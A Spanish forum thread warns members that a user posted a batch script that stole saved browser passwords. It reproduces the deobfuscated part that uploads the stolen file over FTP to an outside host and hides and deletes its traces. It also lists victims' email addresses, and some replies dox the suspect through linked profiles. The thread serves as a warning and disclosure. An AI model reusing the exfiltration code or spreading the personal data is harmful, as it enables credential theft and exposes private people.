Test Foro de elhacker.net SMF 2.1

Recientemente el usuario leostigma (http://foro.elhacker.net/profiles/leostigma-u563102.html) publicó un script en el foro de programación-scripting, y también publicó una serie de archivos executables, que le sirvieron para robar contraseña (mediante un servidor FTP) a los que hayan usado esos archivos.

Por ese motivo, las contraseñas de navegadores de algunos usuarios del foro, sobre todo los habituales en el foro de scripting, han podido ser hackeadas.

Como ya saben, el foro no se hace responsable del contenido que puedan subir los usuarios, solo podemos intentar prevenir que sucedan este tipo de incidentes ...a veces cuando ya es demasiado tarde.

Si alguien del foro descargó su script o executables, debe asegurarse de cambiar su contraseña en los servicios web que esté registrado, sobre todo en servicios importantes como Paypal.

---

Por mi parte, les intentaré ofrecer la ayuda que pueda en este mensaje.

Estas son (al menos unas de) las cuentas de correo que se han visto afectadas por la infección de este usuario:

• acxaelpotter@hotmail.com
• c.d.c.r@hotmail.com
• claudiadaniela31@hotmail.com
• gabrielrangel709@hotmail.com
• gabrielrangel711@hotmail.com
• italy55@outlook.de
• kevincaballero1405@gmail.com
• mc.chumpitaz@gmail.com

Y estos los nombres de usuario con los que se registraron en distintos servicios web:

• gabo666
• gabogabo123
• gabriel rangel
• gabrielrangel711
• mrsdax
• Reikym
• zando

Aquí pueden ver la lista de páginas web y usuarios que se han visto implicadas (por el momento), he censurado las contraseñas por supuesto:

ACLARACIÓN: Esta lista la he obtenido accediendo al FTP de esta persona, gracias a que otro usuario me informó de este incidente y me proporcionó el user y el pass del FTP.

CitarBrowser:  Google Chrome
Website:  https://es-la.facebook.com/login.php
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.linkedin.com/fetch/fetchx-auth-redirect
Username: c.d.c.r@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://trafficmonsoon.com/login.php
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://trafficmonsoon.com/login.php
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: c.d.c.r@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://col430-sec.mail.live.com/mail/AggregationSetupFinished.aspx
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.123dreamit.com/accounts/register/
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://signup.live.com/signup
Username: gabogabo123
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://reelzhot.com/subscriptions/registrationaff/m-2-panther
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://trafficmonsoon.com/login
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.thepowerlevel.com/silkroad/premium-silk/92-26-2.html
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.goldceo.com/silkroad/premium-silk/92-26-2.html
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://accounts.google.com/SignUp
Username: gabrielrangel711
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://membercp.joymax.com/SignIn/SignInProperty.aspx
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://membercp.joymax.com/SignIn/SignInProperty.aspx
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://projecthax.com/login.php
Username: zando
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://ic.paypal.com/webapps/checkout/webflow/sparta/expresscheckoutvalidatedataflow
Username: kevincaballero1405@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://projecthax.com/login.php
Username: zando
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.wtfast.com/member/Account/Login
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.wtfast.com/Account/Create
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://es-la.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://m.facebook.com/login/async/
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://foro.ignetwork.net/register.php
Username: gabo666
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://login.live.com/ppsecure/post.srf
Username: italy55@outlook.de
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: c.d.c.r@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://us.battle.net/login/es/challenge/8d18a451-7eb4-445d-a78d-8c1d04f1b121
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://accounts.google.com/signin/challenge/sl/password
Username: kevincaballero1405@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://account.leagueoflegends.com/lan/es/protect
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://earnwithinvite.com/login1.php
Username: gabriel rangel
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://likesplanet.com/register.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.paypal.com/signin
Username: mc.chumpitaz@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://mega.nz/login-to-devnull.html
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.paypal.com/signin
Username: kevincaballero1405@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: acxaelpotter@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.mercadolibre.com/jms/mlv/lgz/login/authenticate
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.crunchyroll.com/freetrial/anime
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.paypal.com/signin
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.worldwaronline.com/login/register
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://login.live.com/ppsecure/post.srf
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://login.live.com/ppsecure/post.srf
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel709@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://cpanel.hostinger.es/website/install-app/app/wordpress/aid/21240506
Username: Reikym
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://reikym.esy.es/wp-login.php
Username: Reikym
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://reikym.esy.es/wp-login.php
Username: Reikym
Password: **CENSURADO**
---------------------------------------------------------------------------

Un saludo.

Menos mas que no me fiaba de descargarme el programa lo dije en el mismo post no me daba confianza sin poner un vídeo ni nada y así de sopetón vamos que el tal usuario  leostigma no la ha metido doblada menos mas que a mi no me la metido por que no llegue ha descargarmelo.

Aparte que me escribías por los privados, desde aquí te digo leostigma que a mi no me la vas a dar se la has dado a otros y espero que a los usuarios de este foro que le has robado las contraseñas supuestamente que te denuncien uno por uno para que se te quites las ganas de robar contraseñas a los demás por listillo.

Desde hoy tenemos que tener claro que no podemos descargarnos mas nada de ningún usuario novato aunque venga con buenas intenciones. >:D

El script que había publicado inicialmente, tenía una parte ofuscada. Esa parte era la que debería subir la info por ftp.

Dejo aquí la parte ofuscada (ya desofuscada) de su script original, sólo para que lo vean. Pueden apreciar que su intención ya era maligna, pues aparece el ftp, el user y la pass que quería usar:


...............................................................
echo>> !usb!:informacionftpstart.bat

Timeout /T 2

echo ftp - s:ftpstart.bat>> !usb!:informacionftpstart.bat
echo open ftp.extracto.esY.es>> !usb!:informacionftpstart.bat
echo USUARNAME>> !usb!:informacionftpstart.bat
echo PASSWORD>> !usb!:informacionftps tart.bat
echo put CLAVES*.txt>>!usb!:informacionftpstart.bat
echo bYe>> !usb!:informacionftpstart.bat
echo >> !usb!:informacionstyle.vbs
echo set objshell = createobject("wscript.shell" )>>!usb!:informacionstyle.vbs
echo objshell.run "ftpstart.bat",vbhide>>!usb!:informacionstyle.vbs
attrib -r -h /s /D "!usb!:informacionftpstart.bat"
cd !usb!:informacion
Timeout /T 1
(
ECHO 1d
ECHO e
) | edlin /B style.vbs > nul 1>&0

attrib -r -h /s /D "!usb!:informacionstyle.vbs"
attrib -r -h /s /D "!usb!:informacionSTYLE.BAK"
Timeout /T 2

start !usb!:informacionstyle.vbs
Timeout /T 15
TASKKILL /F /IM ftp.exe

attrib -r -h /s /D "!usb!:informacionstyle.vbs"
attrib -r -h /s /D "!usb!:informacionSTYLE.BAK"
attrib -r -h /s /D "!usb!:informacionftpstart.bat"

del !usb!:informacionstyle.vbs
del !usb!:informacionftpstart.bat
del !usb!:informacionSTYLE.BAK

......................................................................


[ELEKTRO]
He eliminado el nombre de usuario y pass del código, NO ES PLAN de proporcionarle esa información a otros usuarios mal intencionados para que accedan al FTP con esa lista de contraseñas y Paypals ajenos...

Yo de verdad es que a veces hay cosas no entiendo, si lo sabíais desde el principio que no era de fiar, lo dije en el mismo post por eso dije si lo habéis probado que casualidad no lo hemos probado ninguno de los que hemos hablado yo por personalmente por que no me fiaba de este usuario y al final he hecho bien por lo que veo.

Y menos mas porque para mi fue descarado el Script vamos que si lo hubiera probado en mi PC se hubiera llevado todas mis contraseñas y menos que no ha sido así.

Pero fallo por partes vuestro por no a ver revisado antes el script si era con mala intención.

Saludos.

Cita de: El_Andaluz en 14 Septiembre 2016, 14:26 PM
Yo de verdad es que a veces hay cosas no entiendo si lo sabias desde el principio que no era de fiar lo dije en el mismo post por eso dije si lo habéis probado que casualidad no lo hemos probado ninguno de los que hemos hablado yo por personalmete por que no me fiaba de este usuarios y al final hecho bien.

Y menos mas porque para mi fue descarado el script vamos que si lo hubiera probado en mi PC se hubiera llevado todas mis contraseñas y menos que no ha sido así.

Pero fallo por partes vuestra por no a veo revisado antes el script si era con mala intención.

Saludos.

Sólo desofusqué la primera línea del script. No lo desofusqué todo. Pero dí la forma de desofuscar todo el código. Por eso no pude ver que, en su momento, que el script era malicioso.

Además, no soy "experto" en batch, sólo me defiendo un poco en el tema...  :P

Cita de: MCKSys Argentina en 14 Septiembre 2016, 14:18 PM
He eliminado el nombre de usuario y pass del código, NO ES PLAN de proporcionarle esa información a otros usuarios mal intencionados para que accedan al FTP con esa lista de contraseñas y Paypals ajenos...

Uf!! Sabía que me había olvidado de algo al subir el script, pero no recordaba qué era!!!!! Menos mal que hay más de 2 ojos mirando los posts...  :)

Saludos!

Cita de: El_Andaluz en 14 Septiembre 2016, 14:26 PMPero fallo por partes vuestra por no a veo revisado antes el script si era con mala intención.

Nuestra tarea no consiste en analizar todos los códigos y/o aplicaciones que los usuarios publiquen, sino más bien se limitaría a tratar de que ese código se publique en la sección correcta y se haga de la manera adecuada.

En casos donde existe cierta desconfianza por la fuente de un código o aplicación, por supuesto en muchos casos los moderadores (me incluyo) han analizado ese código sospechoso para intentar verificar que no sea malicioso, en algunos casos se a descubierto que si gracias a ese análisis y se han tomado las medidas necesarias con el usuario.

De todas formas, si alguien nos hubiera pedido como favor que analizásemos el código por que no estaba muy seguro de las intenciones del código, yo lo habría desofuscado y analizado, pero como nadie pidió tal cosa (al menos a mi no), yo solo vi un código escrito en Batch al que no le di mayor importancia indiferentemente de la ofuscación ...precisamente por que estaba escrito en Batch y por eso jamás pensé que este personaje fuese tan estúpido como para publicar datos personales en su propio script (el user y el pass de la FTP).

Un saludo!

CitarSólo desofusqué la primera línea del script. No lo desofusqué todo. Pero dí la forma de desofuscar todo el código. Por eso no pude ver que, en su momento, que el script era malicioso.

Además, no soy "experto" en batch, sólo me defiendo un poco en el tema...  :P

La vedad no se que es desosfusqué tampoco entiendo mucho del tema de este tipos de Script pero se supone que existen herramientas para analizarla y ver si hay algo mal intencionado en el Script.

Por que no se ha robado solo las cuentas de los usuarios, que se supone que le han robado hasta las cuentas de los datos bancarios que esto ya si que es grave.

Pero vuelvo a repetir, creo que se podía a ver evitado esto por parte de vosotros los moderadores con esto no digo que tengáis la culpa, porque si es verdad que no nos hacemos responsable de lo que suba cada usuario al foro pero si sois responsable de revisarlo antes o eso creo y pienso que se debería revisar siempre por seguridad.

Saludos.

Cita de: El_Andaluz en 14 Septiembre 2016, 14:43 PMPero vuelvo a repetir creo que se podía a ver evitado esto por parte de vosotros los moderadores con esto no digo que tengáis la culpa porque si es verdad que no nos hacemos responsable de lo que suba cada usuario al foro

pero si sois responsable de revisarlo antes o eso creo.

La tarea de un moderador consiste en administrar y clasificar el contenido de un foro, pudiendo ofrecer cierto nivel de seguridad en el contenido que los usuarios descarguen, pero tampoco somos agentes federales del CSI, no estamos aquí para regular todo el contenido que se publique y hacerlo con una lupa en la mano, eso es imposible, vaya, así que la seguridad no siempre es eficaz al 100% y pueden pasar cosas como lo que ha sucedido...

El análisis de archivos es algo opcional, algo que surje de la personalidad o amabilidad del moderador, no de su obligación. En lugar de criticar deberías estarle agradecido a MckSys Argentina :P (ya se que le estás)
De hecho, que yo te haya avisado a ti por mensaje privado, y que yo haya publicado este post de advertencia para los demás usuarios del foro, tampoco entra dentro de mis obligaciones.

Saludos!

CitarEl análisis de archivos es algo opcional, algo que surje de la personalidad o amabilidad del moderador, no de su obligación, en este y en todos los foros, vaya. En lugar de criticar deberías estarle agradecido a MckSys Argentina :P (ya se que le estás)

En verdad te estoy criticando a ti que se supone que sabes mas del tema  :xD :P

Yo creo que debería ser algo obligatorio en los foros y mas en este de revisarse los códigos de los Scritp que cada usuario suba por lo menos analizarlos.

Y por cierto te lo he agradecido por privado que me hayas avisado.


Saludos.

Cita de: El_Andaluz en 14 Septiembre 2016, 15:07 PMEn verdad te estoy criticando a ti que se supone que sabes mas del tema  :xD :P

No es cuestión de saber o no, me confié, simplemente vi un script escrito en Batch y no le di importancia por que es un lenguaje digamos muy... limitado, y vi que estaba ofuscado, pero pensé que el autor del código simplemente lo quiso ofuscar para que las personas inexpertas no pudieran reproducir su tecnica y "robarle" el trabajo que hizo, así que ignoré ese código sin pensar que pudiera ser malicioso.

¿Que fue un error confiar en eso?, si, lo fue, pero ya pasó y yo no tengo la culpa.

Saludos!

¿culpa de los moderadores? jajaja claro ¿por qué no le enseñan a cada usuario a no usar cosas que ni saben como analizar o protegerse?Es como tener un bazar y ser responsable del uso que el comprador le de a un cuchillo, no vaya a ser que se corte al hacer una ensalada! El problema es el que baja algo, y no tiene idea de donde viene ¿el qué lo subió tiene años en el foro?, y aún así, todavía no aprenden sobre el uso de VM mínimo y otra cosa no recuerdo bien el post porque no le di bola a la huevada que era, pero ¿qué se suponía que hacía el script?

Excelente trabajo de los administradores!!

Cuando vi la conexión al FTP sabía que algo malo se traía leostigma...
Menos mal ejecute el script desde virtual box..... si no me hubiese robado todos mis pass

lo que entendi es que subieron un .bat que robaba las passwords de todos los navegadores y las sube a un ftp ??
como funciona exactamente?
robaba passwords del navegador que estubiese abierto? o si esta cerrado tambien ? funciona con todos los navegadores?

Era demasiado sospechoso xD medio script ofuscado y luego todo el proceso de copia? XD

Cita de: doctorman en 16 Septiembre 2016, 19:12 PM
lo que entendi es que subieron un .bat que robaba las passwords de todos los navegadores y las sube a un ftp ??
como funciona exactamente?
robaba passwords del navegador que estubiese abierto? o si esta cerrado tambien ? funciona con todos los navegadores?

El usuario compartio un .bat que buscaba los usuarios y contraseñas guardados en la pc de los exploradores, los guardaba en un ".txt" despues en el mismo batch subia ese txt a un ftp de el, es decir a lsoq ue usuban ese batch, si bien si guardaba las contraseñas y uno las podia ver, pero tambien las podia ver el en su ftp...

Cita de: Razzari en 16 Septiembre 2016, 20:09 PM
El usuario compartio un .bat que buscaba los usuarios y contraseñas guardados en la pc de los exploradores, los guardaba en un ".txt" despues en el mismo batch subia ese txt a un ftp de el, es decir a lsoq ue usuban ese batch, si bien si guardaba las contraseñas y uno las podia ver, pero tambien las podia ver el en su ftp...

no sabia que un solo .bat podia hacer tantas cosas, de seguro los usuarios que se infectaron no tenian antivirus ni firewall, hasta la porqueria del norton hubiese detectado .bat y hubiese dado una advertencia antes de ejecutarlo, o hasta el firewall del xp hubiese bloqueado el bat.

Cita de: doctorman en 16 Septiembre 2016, 20:41 PM
no sabia que un solo .bat podia hacer tantas cosas, de seguro los usuarios que se infectaron no tenian antivirus ni firewall, hasta la porqueria del norton hubiese detectado .bat y hubiese dado una advertencia antes de ejecutarlo, o hasta el firewall del xp hubiese bloqueado el bat.

xD Vale que casi todos los antivirus son porquería, pero dentro de toda esa porquería Norton esta bastante bien... Kaspersky también y algunos más....

Cita de: doctorman en 16 Septiembre 2016, 20:41 PM
no sabia que un solo .bat podia hacer tantas cosas, de seguro los usuarios que se infectaron no tenian antivirus ni firewall, hasta la porqueria del norton hubiese detectado .bat y hubiese dado una advertencia antes de ejecutarlo, o hasta el firewall del xp hubiese bloqueado el bat.

Batch es un lenguaje que no se usa para nada, ningún antivirus sospecharía. Por eso tantas personas caen.

hola amigos me llamo la atención este hombre a si que le me ti cola

el individuo lo publico también en taringa

http://www.taringa.net/posts/taringa/19579575/Extracto-Usb-Roba-Datos.html (http://www.taringa.net/posts/taringa/19579575/Extracto-Usb-Roba-Datos.html)

datos de el en taringa

http://www.taringa.net/leostigma (http://www.taringa.net/leostigma)

y por descuido vinculo su cuenta a facebook no se si sea la de el pero esta cuenta es la que vinculo

https://www.facebook.com/G4BoXx (https://www.facebook.com/G4BoXx)

es de un tal g4BoXx

y anduve un poquito mas a ver si concordaba algo en su correo de recuperación de facebook y esto encontré

(https://s22.postimg.io/498mb1khd/Sin_t_tulo.png)

creo que es la l de leostigma

Saludos Flamer y perdón si corrompí alguna regla y si es así borren mi comentario

En el otro post donde se publico el Script de leostigma ya comente que me resulto raro que se lo borraran de taringa no le duro ni 5 minutos.

Saludos.

bueno lei el post en taringa y no es un solo .bat como ustedes dicen sino que tambien tiene un extracto.vbs y un navegador.exe, ya se me hacia raro que un solo bat hiciese todo eso solo....